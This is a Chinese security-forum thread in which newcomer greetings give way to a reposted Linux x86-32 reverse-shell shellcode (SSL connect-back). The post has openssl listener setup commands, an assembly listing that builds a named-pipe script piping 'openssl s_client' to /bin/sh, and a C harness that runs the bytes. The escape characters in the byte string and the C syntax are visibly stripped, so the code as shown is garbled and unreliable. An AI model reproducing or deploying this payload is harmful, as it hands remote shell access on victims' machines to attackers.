最近看过此主题的会员

返回列表 发帖

新人多多照顾

新人,进来学习,希望大家多多指教。谢谢,愿论坛越来越好。
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:Fiend发表,本帖发表者Fiend符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者Fiend和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

回复 1# Fiend


   热烈欢迎你的到来,请多多参与讨论,多多发帖!

TOP

我擦擦擦 这你吗都沉静了多久了

TOP

新同学来了。。。

TOP

TOP

Linux/x86-32 - ConnectBack with SSL connection



/*

**

** Title: Linux/x86-32 - ConnectBack with SSL connection - 422 bytes

** Date: 2011-06-08

** Tested on: ArchLinux i686

** Author: Jonathan Salwan - twitter: @shell_storm

**

** http://shell-storm.org

**

**

** Configurations server

** ===========================================================================

** jonathan@ArchLinux [ssl] $ openssl genrsa -des3 -out server.key 1024

** jonathan@ArchLinux [ssl] $ openssl req -new -key server.key -out server.csr

** jonathan@ArchLinux [ssl] $ cp server.key server.key.org

** jonathan@ArchLinux [ssl] $ openssl rsa -in server.key.org -out server.key

** jonathan@ArchLinux [ssl] $ openssl x509 -req -days 365 -in server.csr -sign

** key server.key -out server.crt

** jonathan@ArchLinux [ssl] $ ll

** total 16

** -rw-r--r-- 1 jonathan users 757 Jun 8 09:36 server.crt

** -rw-r--r-- 1 jonathan users 603 Jun 8 09:36 server.csr

** -rw-r--r-- 1 jonathan users 887 Jun 8 09:36 server.key

** -rw-r--r-- 1 jonathan users 963 Jun 8 09:36 server.key.org

** jonathan@ArchLinux [ssl] $

**

**

** Running server

** ===========================================================================

** jonathan@ArchLinux [ssl] $ openssl s_server -key server.key -cert server.cr

** t -accept 8080

**

**

** After the server was opened you can send the shellcode.

** Warning! The client need tsch and openssl installed.

**

**

** Informations shellcode

** ===========================================================================

**

** Reverse TCP with SSL (why not)

** Linux x86 32bits

** 422 bytes

**

**

** ASM sources

** ===========================================================================

**

** 08048054 <main>:

** 8048054: 31 c0 xor %eax%eax

** 8048056: 50 push %eax

** 8048057: 6a 65 push $0x65

** 8048059: 68 6b 70 69 70 push $0x7069706b

** 804805e: 68 2f 62 61 63 push $0x6361622f

** 8048063: 68 2f 74 6d 70 push $0x706d742f

** 8048068: 89 e3 mov %esp%ebx

** 804806a: b0 0a mov $0xa%al

** 804806c: cd 80 int $0x80

** 804806e: 85 c0 test %eax%eax

** 8048070: 75 32 jne 80480a4 <del2>

** 8048072: 31 c0 xor %eax%eax

** 8048074: 31 db xor %ebx%ebx

** 8048076: 31 d2 xor %edx%edx

** 8048078: b3 01 mov $0x1%bl

** 804807a: 31 c0 xor %eax%eax

** 804807c: 50 push %eax

** 804807d: 6a 6e push $0x6e

** 804807f: 66 68 64 5c pushw $0x5c64

** 8048083: 68 6c 65 74 65 push $0x6574656c

** 8048088: 68 65 20 64 65 push $0x65642065

** 804808d: 68 6b 70 69 70 push $0x7069706b

** 8048092: 68 2f 62 61 63 push $0x6361622f

** 8048097: 68 2f 74 6d 70 push $0x706d742f

** 804809c: 89 e1 mov %esp%ecx

** 804809e: b2 17 mov $0x17%dl

** 80480a0: b0 04 mov $0x4%al

** 80480a2: cd 80 int $0x80



** 080480a4 <del2>:

** 80480a4: 31 c0 xor %eax%eax

** 80480a6: 50 push %eax

** 80480a7: 66 68 73 6c pushw $0x6c73

** 80480ab: 68 2f 63 62 73 push $0x7362632f

** 80480b0: 68 2f 74 6d 70 push $0x706d742f

** 80480b5: 89 e3 mov %esp%ebx

** 80480b7: b0 0a mov $0xa%al

** 80480b9: cd 80 int $0x80

** 80480bb: 85 c0 test %eax%eax

** 80480bd: 75 2a jne 80480e9 <open>

** 80480bf: 31 c0 xor %eax%eax

** 80480c1: 31 db xor %ebx%ebx

** 80480c3: 31 d2 xor %edx%edx

** 80480c5: 50 push %eax

** 80480c6: 68 65 64 5c 6e push $0x6e5c6465

** 80480cb: 68 65 6c 65 74 push $0x74656c65

** 80480d0: 68 73 6c 20 64 push $0x64206c73

** 80480d5: 68 2f 63 62 73 push $0x7362632f

** 80480da: 68 2f 74 6d 70 push $0x706d742f

** 80480df: 89 e1 mov %esp%ecx

** 80480e1: b3 01 mov $0x1%bl

** 80480e3: b2 14 mov $0x14%dl

** 80480e5: b0 04 mov $0x4%al

** 80480e7: cd 80 int $0x80

**

** 080480e9 <open>:

** 80480e9: 31 c0 xor %eax%eax

** 80480eb: 31 c9 xor %ecx%ecx

** 80480ed: 31 d2 xor %edx%edx

** 80480ef: 66 b9 41 04 mov $0x441%cx

** 80480f3: 66 ba a4 01 mov $0x1a4%dx

** 80480f7: 50 push %eax

** 80480f8: 66 68 73 6c pushw $0x6c73

** 80480fc: 68 2f 63 62 73 push $0x7362632f

** 8048101: 68 2f 74 6d 70 push $0x706d742f

** 8048106: 89 e3 mov %esp%ebx

** 8048108: b0 05 mov $0x5%al

** 804810a: cd 80 int $0x80

** 804810c: 89 c6 mov %eax%esi

**

** 0804810e <wtite>:

** 804810e: 31 d2 xor %edx%edx

** 8048110: 89 f3 mov %esi%ebx

** 8048112: 31 c0 xor %eax%eax

** 8048114: 50 push %eax

** 8048115: 66 68 70 65 pushw $0x6570

** 8048119: 68 63 6b 70 69 push $0x69706b63

** 804811e: 68 70 2f 62 61 push $0x61622f70

** 8048123: 68 3e 2f 74 6d push $0x6d742f3e

** 8048128: 68 73 68 20 31 push $0x31206873

** 804812d: 68 6e 2f 74 63 push $0x63742f6e

** 8048132: 68 20 2f 62 69 push $0x69622f20

** 8048137: 68 70 65 20 7c push $0x7c206570

** 804813c: 68 63 6b 70 69 push $0x69706b63

** 8048141: 68 70 2f 62 61 push $0x61622f70

** 8048146: 68 3c 2f 74 6d push $0x6d742f3c

**

** x6cx6fx63x61x6cx68x6fx73x74x3ax38x30x38x30 >----------+

** localhost:8080 |

** If you change that you need to change write(... ... size_t) (%edx) |

** |

** 804814b: 68 38 30 20 30 push $0x30203038 <---+

** 8048150: 68 74 3a 38 30 push $0x30383a74 <---+

** 8048155: 68 6c 68 6f 73 push $0x736f686c <---+

** 804815a: 68 6c 6f 63 61 push $0x61636f6c <---+

**

**

** 804815f: 68 65 63 74 20 push $0x20746365

** 8048164: 68 63 6f 6e 6e push $0x6e6e6f63

** 8048169: 68 6e 74 20 2d push $0x2d20746e

** 804816e: 68 63 6c 69 65 push $0x65696c63

** 8048173: 68 6c 20 73 5f push $0x5f73206c

** 8048178: 68 65 6e 73 73 push $0x73736e65

** 804817d: 68 6e 2f 6f 70 push $0x706f2f6e

** 8048182: 68 72 2f 62 69 push $0x69622f72

** 8048187: 68 20 2f 75 73 push $0x73752f20

** 804818c: 68 70 20 26 26 push $0x26262070

** 8048191: 68 69 70 65 20 push $0x20657069

** 8048196: 68 61 63 6b 70 push $0x706b6361

** 804819b: 68 6d 70 2f 62 push $0x622f706d

** 80481a0: 68 64 20 2f 74 push $0x742f2064

** 80481a5: 68 6d 6b 6e 6f push $0x6f6e6b6d

** 80481aa: 89 e1 mov %esp%ecx

** 80481ac: b2 77 mov $0x77%dl

** 80481ae: 31 c0 xor %eax%eax

** 80481b0: b0 04 mov $0x4%al

** 80481b2: cd 80 int $0x80

**

** 080481b4 <close>:

** 80481b4: 31 c0 xor %eax%eax

** 80481b6: b0 06 mov $0x6%al

** 80481b8: 89 f3 mov %esi%ebx

** 80481ba: cd 80 int $0x80

**

** 080481bc <execve>:

** 80481bc: 31 c0 xor %eax%eax

** 80481be: 50 push %eax

** 80481bf: 66 68 73 6c pushw $0x6c73

** 80481c3: 68 2f 63 62 73 push $0x7362632f

** 80481c8: 68 2f 74 6d 70 push $0x706d742f

** 80481cd: 89 e3 mov %esp%ebx

** 80481cf: 50 push %eax

** 80481d0: 66 68 2d 65 pushw $0x652d

** 80481d4: 89 e1 mov %esp%ecx

** 80481d6: 50 push %eax

** 80481d7: 6a 68 push $0x68

** 80481d9: 66 68 2f 73 pushw $0x732f

** 80481dd: 68 2f 62 69 6e push $0x6e69622f

** 80481e2: 89 e2 mov %esp%edx

** 80481e4: 50 push %eax

** 80481e5: 53 push %ebx

** 80481e6: 51 push %ecx

** 80481e7: 52 push %edx

** 80481e8: 89 e1 mov %esp%ecx

** 80481ea: 89 d3 mov %edx%ebx

** 80481ec: 31 d2 xor %edx%edx

** 80481ee: b0 0b mov $0xb%al

** 80481f0: cd 80 int $0x80

**

** 080481f2 <exit>:

** 80481f2: 31 c0 xor %eax%eax

** 80481f4: b0 01 mov $0x1%al

** 80481f6: 31 db xor %ebx%ebx

** 80481f8: cd 80 int $0x80

**

**

*/



#include <stdio.h>

#include <stdlib.h>

#include <string.h>



char SC[] = x31xc0x50x6ax65x68x6bx70x69x70x68x2fx62x61x63

x68x2fx74x6dx70x89xe3xb0x0axcdx80x85xc0x75x32

x31xc0x31xdbx31xd2xb3x01x31xc0x50x6ax6ex66x68

x64x5cx68x6cx65x74x65x68x65x20x64x65x68x6bx70

x69x70x68x2fx62x61x63x68x2fx74x6dx70x89xe1xb2

x17xb0x04xcdx80x31xc0x50x66x68x73x6cx68x2fx63

x62x73x68x2fx74x6dx70x89xe3xb0x0axcdx80x85xc0

x75x2ax31xc0x31xdbx31xd2x50x68x65x64x5cx6ex68

x65x6cx65x74x68x73x6cx20x64x68x2fx63x62x73x68

x2fx74x6dx70x89xe1xb3x01xb2x14xb0x04xcdx80x31

xc0x31xc9x31xd2x66xb9x41x04x66xbaxa4x01x50x66

x68x73x6cx68x2fx63x62x73x68x2fx74x6dx70x89xe3

xb0x05xcdx80x89xc6x31xd2x89xf3x31xc0x50x66x68

x70x65x68x63x6bx70x69x68x70x2fx62x61x68x3ex2f

x74x6dx68x73x68x20x31x68x6ex2fx74x63x68x20x2f

x62x69x68x70x65x20x7cx68x63x6bx70x69x68x70x2f

x62x61x68x3cx2fx74x6d

/* localhost:8080 */

x68x38x30x20x30x68x74x3ax38x30x68x6cx68x6fx73

x68x6cx6fx63x61

/* EOF */

x68x65x63x74x20x68x63x6fx6ex6ex68x6ex74x20x2d

x68x63x6cx69x65x68x6cx20x73x5fx68x65x6ex73x73

x68x6ex2fx6fx70x68x72x2fx62x69x68x20x2fx75x73

x68x70x20x26x26x68x69x70x65x20x68x61x63x6bx70

x68x6dx70x2fx62x68x64x20x2fx74x68x6dx6bx6ex6f

x89xe1xb2x77x31xc0xb0x04xcdx80x31xc0xb0x06x89

xf3xcdx80x31xc0x50x66x68x73x6cx68x2fx63x62x73

x68x2fx74x6dx70x89xe3x50x66x68x2dx65x89xe1x50

x6ax68x66x68x2fx73x68x2fx62x69x6ex89xe2x50x53

x51x52x89xe1x89xd3x31xd2xb0x0bxcdx80x31xc0xb0

x01x31xdbxcdx80;





int main(void)

{

fprintf(stdoutLength: %d
strlen(SC));

(*(void(*)()) SC)();

} 复制代码


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

偶学习的对像:妖精‖→小瑶、爱海滔滔、峥婉儿、话裳、希望、涛涛俊、为你伤心为你哭


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表